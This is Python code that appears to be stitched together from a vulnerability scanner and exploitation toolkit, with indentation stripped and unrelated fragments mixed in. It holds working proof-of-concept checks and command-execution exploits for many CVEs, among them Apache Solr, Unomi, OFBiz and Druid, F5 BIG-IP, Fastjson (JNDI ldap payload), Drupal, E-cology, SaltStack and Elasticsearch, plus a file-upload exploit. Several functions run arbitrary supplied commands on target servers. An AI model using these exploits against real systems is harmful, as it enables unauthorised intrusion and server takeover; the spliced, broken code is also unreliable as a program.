'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
'Accept-Encoding': "zip, deflate",
'Referer': self.url + "/solr/",
'Content-type': "application/x-www-form-urlencoded",
'X-Requested-With': "XMLHttpRequest",
'Connection': "close"
}
urlcore = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
request = requests.get(urlcore, headers=headers, timeout=self.timeout, verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except:
pass
urlconfig = self.url + "/solr/" + str(core_name) + "/admin/mbeans?cat=QUERY&wt=json"
request = requests.get(urlconfig, headers=headers, timeout=self.timeout, verify=False)
url_cmd = self.url + "/solr/" + str(core_name) + "/dataimport"
request = requests.post(url_cmd, data=payload, headers=headers, timeout=self.timeout, verify=False)
if request.status_code == 200 and core_name != "null":
self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info["prt_info"] = "[maybe] [core name:" + url_cmd + "] "
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2020_13942_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Unomi: CVE-2020-13942"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = self.payload_cve_2020_13942.replace(
"RECOMMAND", "whoami")
self.vul_info["vul_name"] = "Apache Unomi remote code execution"
self.vul_info["vul_numb"] = "CVE-2020-13942"
self.vul_info["vul_apps"] = "Unomi"
self.vul_info["vul_date"] = "2020-11-23"
self.vul_info["vul_vers"] = "< 1.5.2"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码," \
"漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞是对CVE-2020-11975漏洞的补丁绕过," \
"攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码。"
self.vul_info["cre_date"] = "2021-01-28"
self.vul_info["cre_auth"] = "zhzyker"
md = dns_request()
cmd = "ping " + md
self.payload = self.payload_cve_2020_13942.replace("RECOMMAND", cmd)
self.headers = {
'User-Agent': self.ua,
'Accept': '*/*',
'Connection': 'close',
'Content-Type': 'application/json'
}
try:
req = requests.post(self.url + "/context.json",
data=self.payload,
headers=self.headers,
timeout=self.timeout,
verify=False)
if dns_result(md):
self.vul_info["vul_data"] = dump.dump_all(req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[dns] [cmd:" + cmd + "]"
else:
rep = list(
json.loads(req.text)
["trackedConditions"])[0]["parameterValues"]["pagePath"]
if r"/tracker/" in rep:
self.vul_info["vul_data"] = dump.dump_all(req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info["prt_info"] = "[maybe]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_22986_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "F5 BIG-IP: CVE-2021-22986"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "F5 BIG-IP Remote Code Execution"
self.vul_info["vul_numb"] = "CVE-2021-22986"
self.vul_info["vul_apps"] = "Flink"
self.vul_info["vul_date"] = "2021-03-11"
self.vul_info["vul_vers"] = "< 16.0.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Remote Code Execution"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "BIG-IP存在代码执行漏洞,该漏洞允许定义身份验证的攻击者通过BIG-IP" \
"管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令," \
"创建或删除文件以及替换服务。该中断只能通过控制界面利用,而不能通过数据界面利用。"
self.vul_info["cre_date"] = "2021-03-20"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
'User-Agent': self.ua,
'Accept': '*/*',
'Connection': 'close',
'Authorization': 'Basic YWRtaW46',
'X-F5-Auth-Token': '',
'Content-Type': 'application/json'
}
md = random_md5()
cmd = "echo " + md
data = r'''{"command": "run", "utilCmdArgs": "-c 'RECOMMAND'"}'''.replace(
"RECOMMAND", cmd)
url = urljoin(self.url, "/mgmt/tm/util/bash")
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
r = json.loads(request.text)["commandResult"]
if request.status_code == 200:
if md in misinformation(r, md):
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["vul_payd"] = data
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_26295_exp(self, cmd):
vul_name = "Apache OFBiz: CVE-2021-26295"
headers = {
'User-Agent': self.ua,
'Content-Type': 'text/xml',
'Connection': 'close'
}
def _trans(s):
return "%s" % ''.join('%.2x' % x for x in s)
try:
dns_data = bytes(cmd, encoding="utf8")
dns_hex = _trans(dns_data)
data = self.payload_cve_2021_26295_exp_1.replace(
"RECOMMAND", dns_hex)
url = urljoin(self.url, "/webtools/control/SOAPService")
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
if r"cus-obj" in request.text:
data = self.payload_cve_2021_26295_exp_2.replace(
"RECOMMAND", dns_hex)
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
if request.status_code == 200:
r = "Command Executed Successfully (But No Echo)"
else:
r = "Command Executed Failed... ..."
verify.exploit_print(r, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
def upload(self,address, port, filename, path = '/usr/www/' ):
url = "http://%s:%d/include/upload.php?targetDir=%s" % ( address, port, path )
try:
files = { 'file': open( filename, 'rb' ) }
cookies = { 'kod_name': '1' } # LOL :D
r = requests.post(url, files=files, cookies=cookies)
if r.text != '{"jsonrpc" : "2.0", "result" : null, "id" : "id"}':
print "[+] Unexpected response, exploit might not work:\n%s\n" % r.text
return True
except Exception as e:
print "[-] ERROR: %s" % e
return False
def fastjson_1262_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Fastjson: 1.2.62"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
self.vul_info["vul_numb"] = "null"
self.vul_info["vul_apps"] = "Fastjson"
self.vul_info["vul_date"] = "2019-10-07"
self.vul_info["vul_vers"] = "<= 1.2.62"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "官方暂未发布针对此漏洞的修复版本,开启了autoType功能的受影响用户可通过关闭autoType来规避风险" \
"(autoType功能默认关闭),另建议将JDK升级到最新版本。"
self.vul_info["cre_date"] = "2021-01-21"
self.vul_info["cre_auth"] = "zhzyker"
headers = {'User-Agent': self.ua, 'Content-Type': "application/json"}
md = dns_request()
dns = md
data = {
"@type": "org.apache.xbean.propertyeditor.JndiConverter",
"AsText": "ldap://" + dns + "//exploit"
}
data = json.dumps(data)
try:
try:
request = requests.post(self.url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
except:
pass
if dns_result(md):
self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] "
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2019_6340_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Drupal: CVE-2019-6340"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "drupal core restful remote code execution"
self.vul_info["vul_numb"] = "CVE-2019-6340"
self.vul_info["vul_apps"] = "Drupal"
self.vul_info["vul_date"] = "2019-02-22"
self.vul_info["vul_vers"] = "< 8.6.10"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "POST/PATCH 请求,在进行 REST API 操作的过程中,会将未经安全过滤的参数内容带入unserialize " \
"函数而触发反序列化漏洞,进而导致任意代码执行。"
self.vul_info["cre_date"] = "2021-01-29"
self.vul_info["cre_auth"] = "zhzyker"
self.path = "/node/?_format=hal_json"
md = random_md5()
cmd = "echo " + md
self.cmd_len = len(cmd)
self.payload = self.payload_cve_2019_6340 % (self.cmd_len, cmd,
self.url)
self.headers = {
'User-Agent': self.ua,
'Connection': "close",
'Content-Type': "application/hal+json",
'Accept': "*/*",
'Cache-Control': "no-cache"
}
try:
request = requests.post(self.url + self.path,
data=self.payload,
headers=self.headers,
timeout=self.timeout,
verify=False)
if md in misinformation(request.text, md):
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_urls"] = self.payload
self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def time_2021_0515_poc(self):
self.threadLock.acquire()
self.vul_info[
"prt_name"] = "E-cology OA WorkflowServiceXml RCE: time-2021-0515"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "E-cology OA WorkflowServiceXml RCE"
self.vul_info["vul_numb"] = "time-2021-0415"
self.vul_info["vul_apps"] = "E-cology"
self.vul_info["vul_date"] = "2021-05-15"
self.vul_info["vul_vers"] = "E-cology <= 9.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "RCE"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "The WorkflowServiceXml interface can be accessed without authorization. The attacker can call this interface to construct a specific HTTP request to bypass the security restrictions of E-cology itself to achieve remote command execution."
self.vul_info["cre_date"] = "2021-05-19"
self.vul_info["cre_auth"] = "zhzyker"
url = urljoin(self.url, "/services%20/WorkflowServiceXml")
md = random_md5()
cmd = "echo " + md
headers = {
'User-Agent': self.ua,
'SOAPAction': '""',
'cmd': cmd,
"Content-Type": "text/xml;charset=UTF-8"
}
data = self.payload_time_2021_0515
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
#print(self.url + " " + str(request.status_code) + request.text)
if md in misinformation(request.text,
md) and request.status_code == 500:
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = data
self.vul_info["prt_info"] = "[rce: " + url + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_25646_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Druid: CVE-2021-25646"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Apache Druid 远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2021-25646"
self.vul_info["vul_apps"] = "Druid"
self.vul_info["vul_date"] = "2021-02-01"
self.vul_info["vul_vers"] = "< 0.20.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。" \
"此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中," \
"经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。" \
"攻击者可直接构造恶意请求执行任意代码,控制服务器。"
self.vul_info["cre_date"] = "2021-02-03"
self.vul_info["cre_auth"] = "zhzyker"
url = urljoin(self.url, "/druid/indexer/v1/sampler")
headers = {
'Content-Type': 'application/json',
'User-Agent': self.ua,
'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
'Connection': 'keep-alive'
}
md = dns_request()
cmd = "ping " + md
data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd)
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
if dns_result(md):
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["vul_payd"] = data
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[dns] [rce] [cmd: " + cmd + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_25282_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "SaltStack: CVE-2021-25282"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "SaltStack 任意文件写入漏洞"
self.vul_info["vul_numb"] = "CVE-2021-25282"
self.vul_info["vul_apps"] = "SaltStack"
self.vul_info["vul_date"] = "2021-02-25"
self.vul_info["vul_vers"] = "< 3002.5"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "未经授权的访问wheel_async,通过salt-api可以执行任意代码/命令。"
self.vul_info["cre_date"] = "2021-03-02"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
"User-agent": self.ua,
"Content-Type": "application/json",
"Connection": "close"
}
url = self.url + "/run"
path = "../../../../../../../../../tmp/vuln"
data = {
'eauth': 'auto',
'client': 'wheel_async',
'fun': 'pillar_roots.write',
'data': 'vuln_cve_2021_25282',
'path': path
}
data = json.dumps(data)
try:
r = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False)
tag = list(json.loads(r.text)["return"])[0]["tag"]
jid = list(json.loads(r.text)["return"])[0]["jid"]
if r"salt/wheel" in tag:
if jid in tag:
self.vul_info["vul_data"] = dump.dump_all(r).decode('utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info["vul_payd"] = path
self.vul_info["prt_info"] = "[upload:" + path + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cnvd_2021_26422_exp(self, cmd):
vul_name = "Eyou Email System: CNVD-2021-26422"
url = urljoin(self.url, "/webadm/?q=moni_detail.do&action=gragh")
payload = "type='|" + cmd + "||'"
try:
request = requests.post(url, data=payload, headers=self.headers, timeout=self.timeout, verify=False)
self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(request.text, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def check_vulnerable_8(base_url):
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
r = get_random_string()
cmd = urllib.quote('echo {0} | base64 -d'.format(base64.b64encode(r)))
url = base_url + '/user/register?element_parents=timezone/timezone/%23value&ajax_form=1'
data = 'form_id=user_register_form&_drupal_ajax=1&timezone[#post_render][]=exec&timezone[#markup]={0}'.format(cmd)
resp = requests.post(url, data, headers=headers, verify=False)
if r in str(resp.content):
return True
return False
def post(self, data):
headers = {
"Content-Type": "text/xml;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/wls-wsat/CoordinatorPortType"
vulnurl = self.url + payload
try:
req = requests.post(vulnurl, data=data, headers=headers, timeout=10, verify=False)
except Exception:
log.error("[-] Connection Error")
if self.confirm_sucess():
self.result = "[!] %s is vuln" % vulnurl
def cve_2015_1427_exp(self, cmd):
vul_name = "Elasticsearch: CVE-2015-1427"
self.data_send_info = r'''{ "name": "cve-2015-1427" }'''
self.data_rce = self.payload_cve_2015_1427.replace("RECOMMAND", cmd)
self.host = self.hostname + ":" + str(self.port)
self.headers_text = {
'Host': "" + self.host,
'Accept': '*/*',
'Connection': 'close',
'Accept-Language': 'en',
'User-Agent': self.ua,
'Content-Type': 'application/text'
}
try:
self.request = requests.post(self.url + "/website/blog/",
data=self.data_send_info,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.req = requests.post(self.url + "/_search?pretty",
data=self.data_rce,
headers=self.headers_text,
timeout=self.timeout,
verify=False)
try:
self.r = list(json.loads(
self.req.text)["hits"]["hits"])[0]["fields"]["lupin"][0]
except IndexError:
self.r = "null"
raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
verify.exploit_print(self.r, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
def cve_2019_17558_exp(self, cmd):
vul_name = "Apache Solr: CVE-2019-17558"
core_name = None
payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
request = requests.get(url_core,
headers=self.headers,
timeout=self.timeout,
verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except AttributeError:
pass
url_api = self.url + "/solr/" + str(core_name) + "/config"
headers_json = {
'Content-Type': 'application/json',
'User-Agent': self.ua
}
set_api_data = """
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
"""
request = requests.post(url_api,
data=set_api_data,
headers=headers_json,
timeout=self.timeout,
verify=False)
request = requests.get(self.url + "/solr/" + str(core_name) +
payload_2,
headers=self.headers,
timeout=self.timeout,
verify=False)
raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(request.text, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
